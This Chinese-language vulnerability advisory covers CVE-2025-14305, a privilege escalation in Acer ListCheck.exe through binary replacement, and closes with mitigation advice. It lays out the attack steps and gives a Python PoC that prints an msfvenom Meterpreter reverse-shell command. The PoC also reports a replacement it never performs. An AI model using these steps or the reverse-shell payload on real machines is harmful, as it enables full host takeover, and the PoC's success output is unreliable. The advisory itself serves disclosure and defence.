CVE-2025-14305: Acer ListCheck.exe 本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-14305

漏洞类型

本地权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Acer ListCheck.exe

漏洞概述

CVE-2025-14305是宏碁（Acer）开发的一款系统工具ListCheck.exe中存在的本地权限提升漏洞。该漏洞允许经过本地身份认证的低权限攻击者通过替换ListCheck.exe可执行文件为恶意程序，实现从普通用户权限到系统最高权限的横向提权。攻击成功后，攻击者可在目标系统上以SYSTEM或管理员权限执行任意代码，完全控制受影响主机。该漏洞属于经典的DLL劫持或二进制替换攻击类型，攻击门槛低且利用稳定，对企业内网终端安全构成严重威胁。由于攻击需要本地访问权限，因此主要影响内网环境和共享终端场景。

技术细节

该漏洞的根本原因在于ListCheck.exe程序目录缺乏充分的写权限控制，导致经过本地认证的低权限用户能够用恶意可执行文件替换合法的ListCheck.exe。系统在后续执行该程序时（如计划任务、服务或特定触发条件下），会自动以较高权限运行被替换的恶意程序，从而实现权限提升。攻击者首先需要具备目标系统的本地用户账号（无需管理员权限），通过文件写入操作将精心构造的恶意可执行文件放置到ListCheck.exe所在的目录，覆盖或替换原始文件。由于ListCheck.exe在设计时可能以SYSTEM或管理员权限运行，恶意程序继承其权限上下文后，攻击者即获得系统最高权限。该漏洞的利用不依赖任何复杂的高级技术，属于典型的本地提权（Local Privilege Escalation, LPE）漏洞，可被用于横向渗透和内网特权维持。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者获取目标系统的本地低权限用户账号，通过系统侦察找到ListCheck.exe的安装路径

STEP 2

步骤2: 文件替换准备

攻击者构造恶意可执行文件（如reverse shell或Meterpreter payload），确保其文件名与ListCheck.exe一致

STEP 3

步骤3: 文件替换

攻击者利用低权限账号的写权限，将原始ListCheck.exe替换为恶意可执行文件，同时备份原始文件

STEP 4

步骤4: 触发执行

等待系统通过计划任务、服务或其他机制自动执行ListCheck.exe，恶意程序以SYSTEM或管理员权限启动

STEP 5

步骤5: 权限提升

恶意程序成功以系统最高权限运行，攻击者获得目标主机的完全控制权，可执行任意代码、安装后门或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14305 PoC - Acer ListCheck.exe Local Privilege Escalation
# Replace ListCheck.exe with a malicious executable
# This PoC demonstrates the file replacement attack vector

import os
import shutil
import ctypes
import sys

def is_admin():
    """Check if running with admin privileges"""
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

def get_listcheck_path():
    """Locate ListCheck.exe path - adjust based on Acer installation"""
    possible_paths = [
        r"C:\Program Files\Acer\ListCheck\ListCheck.exe",
        r"C:\Program Files (x86)\Acer\ListCheck\ListCheck.exe",
        r"C:\Windows\System32\ListCheck.exe",
        r"C:\Windows\SysWOW64\ListCheck.exe",
    ]
    for path in possible_paths:
        if os.path.exists(path):
            return path
    return None

def create_malicious_exe(output_path):
    """
    Generate a malicious executable that spawns a high-privileged shell.
    In a real attack, this would be a reverse shell or meterpreter payload.
    """
    # This is a placeholder - in practice, use msfvenom to generate payload:
    # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o payload.exe
    print(f"[*] Malicious executable would be written to: {output_path}")
    print("[*] In production, generate payload with: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o ListCheck.exe")

def exploit():
    """Main exploitation logic"""
    if not is_admin():
        print("[!] This exploit requires low-privilege user access to target system")
        print("[!] Run as a standard local user account")

    listcheck_path = get_listcheck_path()
    if not listcheck_path:
        print("[!] ListCheck.exe not found on this system")
        return False

    print(f"[*] Found ListCheck.exe at: {listcheck_path}")
    
    # Backup original file
    backup_path = listcheck_path + ".bak"
    shutil.copy2(listcheck_path, backup_path)
    print(f"[*] Backed up original to: {backup_path}")

    # Replace with malicious executable
    create_malicious_exe(listcheck_path)
    print(f"[+] ListCheck.exe replaced with malicious executable")
    print("[+] Await system execution of ListCheck.exe (via scheduled task or service)")
    print("[+] Payload will execute with SYSTEM privileges")

    return True

if __name__ == "__main__":
    exploit()

影响范围

Acer ListCheck.exe (所有已知版本)

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议立即限制ListCheck.exe程序目录的写权限，将该目录设置为仅管理员可写；同时通过应用程序白名单（如Windows Defender Application Control）阻止未经授权的exe文件执行；并使用EDR工具监控文件替换行为和异常进程启动。建议用户关注宏碁官方安全公告，及时更新系统补丁。